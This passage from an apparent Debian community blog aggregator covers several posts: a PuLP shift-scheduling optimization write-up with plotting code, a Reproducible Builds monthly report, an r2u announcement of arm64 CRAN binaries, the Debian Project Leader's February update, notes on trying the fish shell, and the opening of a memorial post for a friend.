PREFERRED) CAROL (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED) EVE (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM (JUDY PREFERRED) JUDY (PREFERRED) ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED) BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED) ALICE (NEUTRAL) FRIDAY (JUDY OFF) ---- SAWING 9:00 AM - 4:00 PM (JUDY DISFAVORED) DAVID (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM (JUDY DISFAVORED) FRANK (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM (JUDY DISFAVORED) GRACE (NEUTRAL) ---- SAWING 2:00 PM - 9:00 PM (JUDY REFUSED) BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM (JUDY REFUSED) HEIDI (NEUTRAL) SATURDAY (JUDY OFF) ---- SAWING 7:30 AM - 2:30 PM (JUDY REFUSED) CAROL (PREFERRED) ---- PAINTING 7:30 AM - 2:30 PM (JUDY REFUSED) IVAN (PREFERRED) ---- SANDING 9:45 AM - 4:45 PM (JUDY REFUSED) DAVID (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM (JUDY DISFAVORED) FRANK (NEUTRAL) ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED) ALICE (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED) BOB (NEUTRAL) SUMMARY -- ALICE benefit: 13.000 3 PREFERRED 2 NEUTRAL 0 DISFAVORED -- BOB benefit: 14.000 4 PREFERRED 1 NEUTRAL 0 DISFAVORED -- CAROL benefit: 9.000 3 PREFERRED 0 NEUTRAL 0 DISFAVORED -- DAVID benefit: 15.000 5 PREFERRED 0 NEUTRAL 0 DISFAVORED -- EVE benefit: 9.000 3 PREFERRED 0 NEUTRAL 0 DISFAVORED -- FRANK benefit: 13.000 3 PREFERRED 2 NEUTRAL 0 DISFAVORED -- GRACE benefit: 8.000 2 PREFERRED 1 NEUTRAL 0 DISFAVORED -- HEIDI benefit: 9.000 1 PREFERRED 3 NEUTRAL 0 DISFAVORED -- IVAN benefit: 12.000 4 PREFERRED 0 NEUTRAL 0 DISFAVORED -- JUDY benefit: 6.000 2 PREFERRED 0 NEUTRAL 0 DISFAVORED
This tells us that on Monday Judy does not work, although she marked the SAWING shift as PREFERRED. Instead David got that shift. What would happen if David gave that shift to Judy? He would lose 3 points, she would gain 3 points, and the total would remain exactly the same at 108.
How would we favor a more even distribution? We need some sort of tie-break. I
want to add a nonlinearity to strongly disfavor people getting a low number of
shifts. But PuLP is very explicitly a linear programming solver, and cannot
solve nonlinear problems. Here we can get around this by enumerating each
specific case, and assigning it a nonlinear benefit function. The most obvious
approach is to define another set of boolean variables:
vars_Nshifts[human][N]
. And then using them to add extra benefit terms, with
values nonlinearly related to Nshifts
. Something like this:
benefit_boost_Nshifts = \ {2: -0.8, 3: -0.5, 4: -0.3, 5: -0.2} for h in humans: benefits[h] = \ ... + \ pulp.lpSum([vars_Nshifts[h][n] * benefit_boost_Nshifts[n] \ for n in benefit_boost_Nshifts.keys()])
So in the previous example we considered giving David's 5th shift to Judy, for her 3rd shift. In that scenario, David's extra benefit would change from -0.2 to -0.3 (a shift of -0.1), while Judy's would change from -0.8 to -0.5 (a shift of +0.3). So the balancing out the shifts in this way would work: the solver would favor the solution with the higher benefit function.
Great. In order for this to work, we need the vars_Nshifts[human][N]
variables
to function as intended: they need to be binary indicators of whether a specific
person has that many shifts or not. That would need to be implemented with
constraints. Let's plot it like this:
#!/usr/bin/python3 import numpy as np import gnuplotlib as gp Nshifts_eq = 4 Nshifts_max = 10 Nshifts = np.arange(Nshifts_max+1) i0 = np.nonzero(Nshifts != Nshifts_eq)[0] i1 = np.nonzero(Nshifts == Nshifts_eq)[0] gp.plot( # True value: var_Nshifts4==0, Nshifts!=4 ( np.zeros(i0.shape), Nshifts[i0], dict(_with = 'points pt 7 ps 1 lc "red"') ), # True value: var_Nshifts4==1, Nshifts==4 ( np.ones(i1.shape), Nshifts[i1], dict(_with = 'points pt 7 ps 1 lc "red"') ), # False value: var_Nshifts4==1, Nshifts!=4 ( np.ones(i0.shape), Nshifts[i0], dict(_with = 'points pt 7 ps 1 lc "black"') ), # False value: var_Nshifts4==0, Nshifts==4 ( np.zeros(i1.shape), Nshifts[i1], dict(_with = 'points pt 7 ps 1 lc "black"') ), unset=('grid'), _set = (f'xtics ("(Nshifts=={Nshifts_eq}) == 0" 0, "(Nshifts=={Nshifts_eq}) == 1" 1)'), _xrange = (-0.1, 1.1), ylabel = "Nshifts", title = "Nshifts equality variable: not linearly separable", hardcopy = "/tmp/scheduling-Nshifts-eq.svg")
So a hypothetical vars_Nshifts[h][4]
variable (plotted on the x axis of this
plot) would need to be defined by a set of linear AND constraints to linearly
separate the true (red) values of this variable from the false (black) values.
As can be seen in this plot, this isn't possible. So this representation does
not work.
How do we fix it? We can use inequality variables instead. I define a different
set of variables vars_Nshifts_leq[human][N]
that are 1 iff Nshifts
<= N
.
The equality variable from before can be expressed as a difference of these
inequality variables: vars_Nshifts[human][N] =
vars_Nshifts_leq[human][N]-vars_Nshifts_leq[human][N-1]
Can these vars_Nshifts_leq
variables be defined by a set of linear AND
constraints? Yes:
#!/usr/bin/python3 import numpy as np import numpysane as nps import gnuplotlib as gp Nshifts_leq = 4 Nshifts_max = 10 Nshifts = np.arange(Nshifts_max+1) i0 = np.nonzero(Nshifts > Nshifts_leq)[0] i1 = np.nonzero(Nshifts <= Nshifts_leq)[0] def linear_slope_yintercept(xy0,xy1): m = (xy1[1] - xy0[1])/(xy1[0] - xy0[0]) b = xy1[1] - m * xy1[0] return np.array(( m, b )) x01 = np.arange(2) x01_one = nps.glue( nps.transpose(x01), np.ones((2,1)), axis=-1) y_lowerbound = nps.inner(x01_one, linear_slope_yintercept( np.array((0, Nshifts_leq+1)), np.array((1, 0)) )) y_upperbound = nps.inner(x01_one, linear_slope_yintercept( np.array((0, Nshifts_max)), np.array((1, Nshifts_leq)) )) y_lowerbound_check = (1-x01) * (Nshifts_leq+1) y_upperbound_check = Nshifts_max - x01*(Nshifts_max-Nshifts_leq) gp.plot( # True value: var_Nshifts_leq4==0, Nshifts>4 ( np.zeros(i0.shape), Nshifts[i0], dict(_with = 'points pt 7 ps 1 lc "red"') ), # True value: var_Nshifts_leq4==1, Nshifts<=4 ( np.ones(i1.shape), Nshifts[i1], dict(_with = 'points pt 7 ps 1 lc "red"') ), # False value: var_Nshifts_leq4==1, Nshifts>4 ( np.ones(i0.shape), Nshifts[i0], dict(_with = 'points pt 7 ps 1 lc "black"') ), # False value: var_Nshifts_leq4==0, Nshifts<=4 ( np.zeros(i1.shape), Nshifts[i1], dict(_with = 'points pt 7 ps 1 lc "black"') ), ( x01, y_lowerbound, y_upperbound, dict( _with = 'filledcurves lc "green"', tuplesize = 3) ), ( x01, nps.cat(y_lowerbound_check, y_upperbound_check), dict( _with = 'lines lc "green" lw 2', tuplesize = 2) ), unset=('grid'), _set = (f'xtics ("(Nshifts<={Nshifts_leq}) == 0" 0, "(Nshifts<={Nshifts_leq}) == 1" 1)', 'style fill transparent pattern 1'), _xrange = (-0.1, 1.1), ylabel = "Nshifts", title = "Nshifts inequality variable: linearly separable", hardcopy = "/tmp/scheduling-Nshifts-leq.svg")
So we can use two linear constraints to make each of these variables work properly. To use these in the benefit function we can use the equality constraint expression from above, or we can use these directly:
# I want to favor people getting more extra shifts at the start to balance # things out: somebody getting one more shift on their pile shouldn't take # shifts away from under-utilized people benefit_boost_leq_bound = \ {2: .2, 3: .3, 4: .4, 5: .5} # Constrain vars_Nshifts_leq variables to do the right thing for h in humans: for b in benefit_boost_leq_bound.keys(): prob += (pulp.lpSum([vars[h][s] for s in shifts.keys()]) >= (1 - vars_Nshifts_leq[h][b])*(b+1), f"{h} at least {b} shifts: lower bound") prob += (pulp.lpSum([vars[h][s] for s in shifts.keys()]) <= Nshifts_max - vars_Nshifts_leq[h][b]*(Nshifts_max-b), f"{h} at least {b} shifts: upper bound") benefits = dict() for h in humans: benefits[h] = \ ... + \ pulp.lpSum([vars_Nshifts_leq[h][b] * benefit_boost_leq_bound[b] \ for b in benefit_boost_leq_bound.keys()])
In this scenario, David would get a boost of 0.4 from giving up his 5th shift, while Judy would lose a boost of 0.2 from getting her 3rd, for a net gain of 0.2 benefit points. The exact numbers will need to be adjusted on a case by case basis, but this works.
The full program, with this and other extra features is available here.
05 March, 2025 08:02PM by Dima Kogan
Welcome to the second report in 2025 from the Reproducible Builds project. Our monthly reports outline what we’ve been up to over the past month, and highlight items of news from elsewhere in the increasingly-important area of software supply-chain security. As usual, however, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website.
Table of contents:
Similar to last year’s event, there was considerable activity regarding Reproducible Builds at FOSDEM 2025, held on on 1st and 2nd February this year in Brussels, Belgium. We count at least four talks related to reproducible builds. (You can also read our news report from last year’s event in which Holger Levsen presented in the main track.)
Jelle van der Waa, Holger Levsen and kpcyrd presented in the Distributions track on A Tale of several distros joining forces for a common goal. In this talk, three developers from two different Linux distributions (Arch Linux and Debian), discuss this goal — which is, of course, reproducible builds. The presenters discuss both what is shared and different between the two efforts, touching on the history and future challenges alike. The slides of this talk are available to view, as is the full video (30m02s). The talk was also discussed on Hacker News.
Zbigniew Jędrzejewski-Szmek presented in the ever-popular Python track a on Rewriting .pyc
files for fun and reproducibility, i.e. the bytecode files generated by Python in order to speed up module imports: “It’s been known for a while that those are not reproducible: on different architectures, the bytecode for exactly the same sources ends up slightly different.� The slides of this talk are available, as is the full video (28m32s).
In the Nix and NixOS track, Julien Malka presented on the Saturday asking How reproducible is NixOS: “We know that the NixOS ISO image is very close to be perfectly reproducible thanks to reproducible.nixos.org, but there doesn’t exist any monitoring of Nixpkgs as a whole. In this talk I’ll present the findings of a project that evaluated the reproducibility of Nixpkgs as a whole by mass rebuilding packages from revisions between 2017 and 2023 and comparing the results with the NixOS cache.� Unfortunately, no video of the talk is available, but there is a blog and article on the results.
Lastly, Simon Tournier presented in the Open Research track on the confluence of GNU Guix and Software Heritage: Source Code Archiving to the Rescue of Reproducible Deployment. Simon’s talk “describes design and implementation we came up and reports on the archival coverage for package source code with data collected over five years. It opens to some remaining challenges toward a better open and reproducible research.� The slides for the talk are available, as is the full video (23m17s).
Vagrant Cascadian presented at this year’s PyCascades conference which was held on February 8th and 9th February in Portland, OR, USA. PyCascades is a regional instance of PyCon held in the Pacific Northwest. Vagrant’s talk, entitled Re-Py-Ducible Builds caught the audience’s attention with the following abstract:
Crank your Python best practices up to 11 with Reproducible Builds! This talk will explore Reproducible Builds by highlighting issues identified in Python projects, from the simple to the seemingly inscrutable. Reproducible Builds is basically the crazy idea that when you build something, and you build it again, you get the exact same thing… or even more important, if someone else builds it, they get the exact same thing too.
More info is available on the talk’s page.
On our mailing list last month, Julien Malka, Stefano Zacchiroli and Théo Zimmermann of Télécom Paris’ in-house research laboratory, the Information Processing and Communications Laboratory (LTCI) announced that they had published an article asking the question: Does Functional Package Management Enable Reproducible Builds at Scale? (PDF).
This month, however, Ludovic Courtès followed up to the original announcement on our mailing list mentioning, amongst other things, the Guix Data Service and how that it shows the reproducibility of GNU Guix over time, as described in a GNU Guix blog back in March 2024.
The last few months have seen the introduction of reproduce.debian.net. Announced first at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project.
Powering this work is rebuilderd, our server which monitors the official package repositories of Linux distributions and attempt to reproduce the observed results there. This month, however, Holger Levsen:
Split packages that are not specific to any architecture away from amd64.reproducible.debian.net service into a new all.reproducible.debian.net page.
Increased the number of riscv64
nodes to a total of 4, and added a new amd64
node added thanks to our (now 10-year sponsor), IONOS.
Discovered an issue in the Debian build service where some new ‘incoming’ build-dependencies do not end up historically archived.
Uploaded the devscripts
package, incorporating changes from Jochen Sprickerhof to the debrebuild
script — specifically to fix the handling the Rules-Requires-Root
header in Debian source packages.
Uploaded a number of Rust dependencies of rebuilderd (rust-libbz2-rs-sys
, rust-actix-web
, rust-actix-server
, rust-actix-http
, rust-actix-server
, rust-actix-http
, rust-actix-web-codegen
and rust-time-tz
) after they were prepared by kpcyrd :
Jochen Sprickerhof also updated the sbuild
package to:
Rules-Requires-Root
.--root-owner-group
to old versions of dpkg.… and additionally requested that many Debian packages are rebuilt by the build servers in order to work around bugs found on reproduce.debian.net. […][[…][…]
Lastly, kpcyrd has also worked towards getting rebuilderd packaged in NixOS, and Jelle van der Waa picked up the existing pull request for Fedora support within in rebuilderd and made it work with the existing Koji rebuilderd script. The server is being packaged for Fedora in an unofficial ‘copr’ repository and in the official repositories after all the dependencies are packaged.
The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:
Andrea Manzini:
rust-i8n
(random HashMap
order)starship/shadow
Andreas Stieger:
Bernhard M. Wiedemann:
Chris Lamb:
python-assertpy
.terminaltables3
.acme.sh
.node-svgdotjs-svg.js
.onevpl-intel-gpu
.rocdbgapi
.siege
.pkg-rocm-tools
.Christian Goll:
warewulf4
(embeds CPU core count)Jay Adddison:
Jochen Sprickerhof:
kpcyrd:
Leonidas Spyropoulos:
Robin Candau (Antiz):
highlight
(timestamp)arch-wiki-lite
(timestamp)f3d
(timestamp)jacktrip
(timestamp)prometheus
(timestamp)Wolfgang Frisch:
Hongxu Jia:
go
(clear GOROOT for func ldShared when -trimpath is used)There as been the usual work in various distributions this month, such as:
In Debian, 17 reviews of Debian packages were added, 6 were updated and 8 were removed this month adding to our knowledge about identified issues.
Fedora developers Davide Cavalca and Zbigniew Jędrzejewski-Szmek gave a talk on Reproducible Builds in Fedora (PDF), touching on SRPM-specific issues as well as the current status and future plans.
Thanks to an investment from the Sovereign Tech Agency, the FreeBSD project’s work on unprivileged and reproducible builds continued this month. Notable fixes include:
pkg
(hash ordering)makefs
(source filesystem inode number leakage)FreeBSD base system packages
(timestamp)The Yocto Project has been struggling to upgrade to the latest Go and Rust releases due to reproducibility problems in the newer versions. Hongxu Jia tracked down the issue with Go which meant that the project could upgrade from the 1.22 series to 1.24, with the fix being submitted upstream for review (see above). For Rust, however, the project was significantly behind, but has made recent progress after finally identifying the blocking reproducibility issues. At time of writing, the project is at Rust version 1.82, with patches under review for 1.83 and 1.84 and fixes being discussed with the Rust developers. The project hopes to improve the tests for reproducibility in the Rust project itself in order to try and avoid future regressions.
Yocto continues to maintain its ability to binary reproduce all of the recipes in OpenEmbedded-Core, regardless of the build host distribution or the current build path.
Finally, Douglas DeMaio published an article on the openSUSE blog on announcing that the Reproducible-openSUSE (RBOS) Project Hits [Significant] Milestone. In particular:
The Reproducible-openSUSE (RBOS) project, which is a proof-of-concept fork of openSUSE, has reached a significant milestone after demonstrating a usable Linux distribution can be built with 100% bit-identical packages.
This news was also announced on our mailing list by Bernhard M. Wiedemann, who also published another report for openSUSE as well.
diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 288
and 289
to Debian:
asar
to DIFFOSCOPE_FAIL_TESTS_ON_MISSING_TOOLS
in order to address Debian bug #1095057
) […]CalledProcessError
when calling html2text
. […]Additionally, Vagrant Cascadian updated diffoscope in GNU Guix to version 287 […][…] and 288 […][…] as well as submitted a patch to update to 289 […]. Vagrant also fixed an issue that was breaking reprotest on Guix […][…].
strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-2
was uploaded to Debian unstable by Holger Levsen.
There were a large number of improvements made to our website this month, including:
Bernhard M. Wiedemann fixed an issue on the Commandments of reproducible builds fixing a link to the readdir
component of Bernhard’s own Unreproducible Package. […]
Holger Levsen clarified the name of a link to our old Wiki pages on the History page […] and added a number of new links to the Talks & Resources page […][…].
James Addison update the website’s own README
file to document a couple of additional dependencies […][…], as well as did more work on a future Getting Started guide page […][…].
The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
reproduce.debian.net-related:
riscv64
archicture nodes and integrate them elsewhere in our infrastructure. […][…]riscv64
architecture nodes. […][…][…][…][…]Debian-related:
FreeBSD-related:
Misc:
In addition:
kpcyrd fixed the /all/api/
API endpoints on reproduce.debian.net by altering the nginx configuration. […]
James Addison updated reproduce.debian.net to display the so-called ‘bad’ reasons hyperlink inline […] and merged the “Categorized issues� links into the “Reproduced builds� column […].
Jochen Sprickerhof also made some reproduce.debian.net-related changes, adding support for detecting a bug in the mmdebstrap
package […] as well as updating some documentation […].
Roland Clobus continued their work on reproducible ‘live’ images for Debian, making changes related to new clustering of jobs in openQA. […]
And finally, both Holger Levsen […][…][…] and Vagrant Cascadian performed significant node maintenance. […][…][…][…][…]
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:
IRC: #reproducible-builds
on irc.oftc.net
.
Mastodon: @reproducible_builds@fosstodon.org
Mailing list: rb-general@lists.reproducible-builds.org
Twitter/X: @ReproBuilds
Welcome to post 46 in the $R^4 series!
r2u, introduced less than three years ago in post #37, has become a runaway success. When I last tabulated downloads in early January, we were already at 33 million downloads of binary CRAN packages across the three Ubuntu LTS releases we support. These were exclusively for the ‘amd64’ platform of standard (Intel or AMD made) x64_64 cpus. Now we are happy to announce that arm64 support has been added and is available!
The arm64 platform is already popular on (cloud) servers and is being pushed quite actively by the cloud vendors. AWS calls their cpu ‘graviton’, GCS calls it ‘axion’. General servers call the cpu ‘ampere’; on laptop / desktops it is branded ‘snapdragon’ or ‘cortex’ or something else. Apple calls their variant M1, M2, … up to M4 by now (and Linux support exists for the brave, it is less straightforward). What these have in common is a generally more favourable ‘power consumed to ops provided’ ratio. That makes these cheaper to run or rent on cloud providers. And in laptops they tend to last longer on a single charge too.
Distributions such as Debian, Ubuntu, Fedora had arm64 for many years. In fact, the CRAN binaries of R, being made as builds at launchpad.net long provided arm64 in Michael’s repo, we now also mirror these to CRAN. Similarly, Docker has long supported containers. And last but not least two issue tickets (#40, #55) had asked a while back.
Good question. I still do not own any hardware with it, and I have not (yet?) bothered with the qemu-based emulation layer. The real difference maker was the recent availability of GitHub Actions instances of ‘ubuntu-24.04-arm’ (and now apparently also for 22.04).
So I started some simple experiments … which made it clear this was viable.
Great question. As is commonly known, of the (currently) 22.1k CRAN packages, a little under 5k are ‘compiled’. Why does this matter? Because the Linux distributions know what they are doing. The 17k (give or take) packages that do not contain compiled code can be used as is (!!) on another platform. Debian and Ubuntu call these builds ‘binary: all’ as they work all platforms ‘as is’. The others go by ‘binary: any’ and will work on ‘any’ platform for which they have been built. So we are looking at roughly 5k new binaries.
As I write this in early March, roughly 4.5k of the 5k. Plus the 17.1k ‘binary: all’ and we are looking at near complete coverage!
Pretty complete. Compare to the amd64 side of things, we do not (yet
?) have BioConductor support; this may be added. A handful of packages
do not compile because their builds seem to assume ‘Linux so must be
amd64’ and fail over cpu instructions. Similarly, a few packages want to
download binary build blobs (my own Rblpapi
among them) but
none exist for arm64. Such is life. We will try to fix builds as time
permits and report build issues to the respective upstream repos. Help
in that endeavour would be most welcome.
But all the big and slow compiles one may care about (hello
duckdb
, hello arrow
, …) are there. Which is
pretty exciting!
In GitHub Actions, just pick ubuntu-24.04-arm
as the
platform, and use the r-ci
or r2u-setup
actiions. A first test yaml exists
worked (though this last version had the arm64 runner commented out
again). (And no, arm64 was not faster than amd64. More tests
needed.)
For simple tests, Docker. The rocker/r-ubuntu:24.04
container exists for arm64 (see here), and one
can add r2u support as is done in
this Dockerfile which is used by the builds and available as
eddelbuettel/r2u_build:noble
. I will add the standard
rocker/r2u:24.04
container (or equally
rocker/r2u:noble
) in a day or two, I had not realised I
wasn’t making them for arm64.
One a real machine such as a cloud instance or a proper instance,
just use the standard r2u script for noble
aka 24.04
available here.
The key lines are the two lines
echo "deb [arch=amd64,arm64] https://r2u.stat.illinois.edu/ubuntu noble main" \
> /etc/apt/sources.list.d/cranapt.list
# ...
echo "deb [arch=amd64,arm64] https://cloud.r-project.org/bin/linux/ubuntu noble-cran40/" \
> /etc/apt/sources.list.d/cran_r.list
creating the apt
entry and which are now arm64-aware.
After that, apt
works as usual, and of course r2u works as
usual thanks also to bspm
so you can just do, say
and enjoy the binaries rolling in. So give it a whirl if you have access to such hardware. We look forward to feedback, suggestes, feature requests or bug reports. Let us know how it goes!
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub.
Dear Debian community,
this is bits from DPL for February.
In December, Scott Kitterman announced his retirement from the project. I personally regret this, as I vividly remember his invaluable support during the Debian Med sprint at the start of the COVID-19 pandemic. He even took time off to ensure new packages cleared the queue in under 24 hours. I want to take this opportunity to personally thank Scott for his contributions during that sprint and for all his work in Debian.
With one fewer FTP assistant, I am concerned about the increased workload on the remaining team. I encourage anyone in the Debian community who is interested to consider reaching out to the FTP masters about joining their team.
If you're wondering about the role of the FTP masters, I'd like to share a fellow developer's perspective:
"My read on the FTP masters is:
- In truth, they are the heart of the project.
- They know it.
- They do a fantastic job."
I fully agree and see it as part of my role as DPL to ensure this remains true for Debian's future.
If you're looking for a way to support Debian in a critical role where many developers will deeply appreciate your work, consider reaching out to the team. It's a great opportunity for any Debian Developer to contribute to a key part of the project.
In my Bits from the DPL talk at DebConf24, I announced the Tiny Tasks effort, which I intended to start with a Bug of the Day project. Another idea was an Autopkgtest of the Day, but this has been postponed due to limited time resources-I cannot run both projects in parallel.
The original goal was to provide small, time-bound examples for newcomers. To put it bluntly: in terms of attracting new contributors, it has been a failure so far. My offer to explain individual bug-fixing commits in detail, if needed, received no response, and despite my efforts to encourage questions, none were asked.
However, the project has several positive aspects: experienced developers actively exchange ideas, collaborate on fixing bugs, assess whether packages are worth fixing or should be removed, and work together to find technical solutions for non-trivial problems.
So far, the project has been engaging and rewarding every day, bringing new discoveries and challenges-not just technical, but also social. Fortunately, in the vast majority of cases, I receive positive responses and appreciation from maintainers. Even in the few instances where help was declined, it was encouraging to see that in two cases, maintainers used the ping as motivation to work on their packages themselves. This reflects the dedication and high standards of maintainers, whose work is essential to the project's success.
I once used the metaphor that this project is like wandering through a dark basement with a lone flashlight-exploring aimlessly and discovering a wide variety of things that have accumulated over the years. Among them are true marvels with popcon >10,000, ingenious tools, and delightful games that I only recently learned about. There are also some packages whose time may have come to an end-but each of them reflects the dedication and effort of those who maintained them, and that deserves the utmost respect.
Leaving aside the challenge of attracting newcomers, what have we achieved since August 1st last year?
With some goodwill, you can see a slight impact on the trends.debian.net graphs (thank you Lucas for the graphs), but I would never claim that this project alone is responsible for the progress. What I have also observed is the steady stream of daily uploads to the delayed queue, demonstrating the continuous efforts of many contributors. This ongoing work often remains unseen by most-including myself, if not for my regular check-ins on this list. I would like to extend my sincere thanks to everyone pushing fixes there, contributing to the overall quality and progress of Debian's QA efforts.
If you examine the graphs for "Version Control System" and "VCS Hosting" with the goodwill mentioned above, you might notice a positive trend since mid-last year. The "Package Smells" category has also seen reductions in several areas: "no git", "no DEP5 copyright", "compat <9", and "not salsa". I'd also like to acknowledge the NMUers who have been working hard to address the "format != 3.0" issue. Thanks to all their efforts, this specific issue never surfaced in the Bug of the Day effort, but their contributions deserve recognition here.
The experience I gathered in this project taught me a lot and inspired me to some followup we should discuss at a Sprint at DebCamp this year.
Finally, if any newcomer finds this information interesting, I'd be happy to slow down and patiently explain individual steps as needed. All it takes is asking questions on the Matrix channel to turn this into a "teaching by example" session.
By the way, for newcomers who are interested, I used quite a few abbreviations-all of which are explained in the Debian Glossary.
I will join two conferences in March-feel free to talk to me if you spot me there.
FOSSASIA Summit 2025 (March 13-15, Bangkok, Thailand) Schedule: https://eventyay.com/e/4c0e0c27/schedule
Chemnitzer Linux-Tage (March 22-23, Chemnitz, Germany) Schedule: https://chemnitzer.linux-tage.de/2025/de/programm/vortraege
Both events will have a Debian booth-come say hi!
Kind regards Andreas.
03 March, 2025 11:00PM by Andreas Tille
I have been testing fish for a couple months now (this file started on
2025-01-03T23:52:15-0500 according to stat(1)
), and those are my
notes. I suspect people will have Opinions about my comments here. Do
not comment unless you have some Constructive feedback to provide: I
don't want to know if you think I am holding it Wrong. Consider that I
might have used UNIX shells for longer that you have lived.
I'm not sure I'll keep using fish, but so far it's the first shell
that survived heavy use outside of zsh(1)
(unless you count
tcsh(1)
, but that was in another millenia).
My normal shell is bash(1)
, and it's still the shell I used
everywhere else than my laptop, as I haven't switched on all the
servers I managed, although it is available since August 2022 on
torproject.org
servers. I first got interested in fish because they
ported to Rust, making it one of the rare shells out there
written in a "safe" and modern programming language, released after an
impressive ~2 year of work with Fish 4.0.
Current directory gets shortened,
~/wikis/anarc.at/software/desktop/wayland
shows up as
~/w/a/s/d/wayland
Autocompletion rocks.
Default prompt rocks. Doesn't seem vulnerable to command injection assaults, at least it doesn't trip on the git-landmine.
It even includes pipe status output, which was a huge pain to implement in bash. Made me realized that if the last command succeeds, we don't see other failures, which is the case of my current prompt anyways! Signal reporting is better than my bash implementation too.
So far the only modification I have made to the prompt is to add a
printf '\a'
to output a bell.
By default, fish keeps a directory history (but separate from the
pushd
stack), that can be navigated with cdh
, prevd
, and
nextd
, dirh
shows the history.
I feel there's visible latency in the prompt creation.
POSIX-style functions (foo() { true }
) are unsupported. Instead,
fish uses whitespace-sensitive definitions like this:
function foo
true
end
This means my (modest) collection of POSIX functions need to be ported to fish. Workaround: simple functions can be turned into aliases, which fish supports (but implements using functions).
EOF heredocs are considered to be "minor syntactic sugar". I find them frigging useful.
Process substitution is split on newlines, not whitespace. you need to
pipe through string split -n " "
to get the equivalent.
<(cmd)
doesn't exist: they claim you can use cmd | foo -
as a
replacement, but that's not correct: I used <(cmd)
mostly where
foo
does not support -
as a magic character to say 'read from
stdin'.
Documentation is... limited. It seems mostly geared the web docs
which are... okay (but I couldn't find out about
~/.config/fish/conf.d
there!), but this is really inconvenient when
you're trying to browse the manual pages. For example, fish thinks
there's a fish_prompt
manual page, according to its own completion
mechanism, but man(1)
cannot find that manual page. I can't find the
manual for the time command (which is actually a keyword!)
Fish renders multi-line commands with newlines. So if your terminal looks like this, say:
anarcat@angela:~> sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
... but it's actually one line, when you copy-paste the above, in foot(1), it will show up exactly like this, newlines and all:
sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
Whereas it should show up like this:
sq keyring merge torproject-keyring/lavamind-95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyring/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
Note that this is an issue specific to foot(1), alacritty(1) and gnome-terminal(1) don't suffer from that issue.
()
is like $()
: it's process substitution, and not a
subshell. This is really impractical: I use ( cd foo ; do_something)
all the time to avoid losing the current directory... I guess I'm
supposed to use pushd
for this, but ouch. This wouldn't be so bad if
it was just for cd
though. Clean constructs like this:
( git grep -l '^#!/.*bin/python' ; fdfind .py ) | sort -u
Turn into what i find rather horrible:
begin; git grep -l '^#!/.*bin/python' ; fdfind .py ; end | sort -ub
It... works, but it goes back to "oh dear, now there's a new langage again". I only found out about this construct while trying:
{ git grep -l '^#!/.*bin/python' ; fdfind .py } | sort -u
... which fails and suggests using begin
/end
, at which point: why
not just support the curly braces?
FOO=bar
is not allowed. It's actually recognized syntax, but creates
a warning. We're supposed to use set foo bar
instead. This really
feels like a needless divergence from standard.
Aliases are... peculiar. Typical constructs like alias mv="\mv -i"
don't work because fish treats aliases as a function definition, and
\
is not magical there. This can be worked around by specifying the
full path to the command, with e.g. alias mv="/bin/mv -i"
. Another
problem is trying to override a built-in, which seems completely
impossible. In my case, I like the time(1)
command the way it
is, thank you very much, and fish provides no way to bypass that
builtin. It is possible to call time(1)
with command time
, but
it's not possible to replace the command
keyword so that means a lot
of typing.
Again: you can't use \
to bypass aliases. This is a huge annoyance
for me. I would need to learn to type command
in long form, and I
use that stuff pretty regularly. I guess I could alias command
to
c
or something, but this is one of those huge muscle memory challenges.
alt . doesn't always work the way i expect.
[I’d like to stop writing posts like this. I’ve been trying to work out what to say now for nearly 2 months (writing the mail to -private
to tell the Debian project about his death is one of the hardest things I’ve had to write, and I bottled out and wrote something that was mostly just factual, because it wasn’t the place), and I’ve decided I just have to accept this won’t be the post I want it to be, but posted is better than languishing in drafts.]
Last weekend I was in Portland, for the Celebration of Life of my friend Steve, who sadly passed away at the start of the year. It wasn’t entirely unexpected, but that doesn’t make it any easier.
I’ve struggled to work out what to say about Steve. I’ve seen many touching comments from others in Debian about their work with him, but what that’s mostly brought home to me is that while I met Steve through Debian, he was first and foremost my friend rather than someone I worked with in Debian. And so everything I have to say is more about that friendship (and thus feels a bit self-centred).
My first memory of Steve is getting lost with him in Porto Alegre, Brazil, during DebConf4. We’d decided to walk to a local mall to meet up with some other folk (I can’t recall how they were getting there, but it wasn’t walking), ended up deep in conversation (ISTR it was about shared library transititions), and then it took a bit longer than we expected. I don’t know how that managed to cement a friendship (neither of us saw it as the near death experience others feared we’d had), but it did.
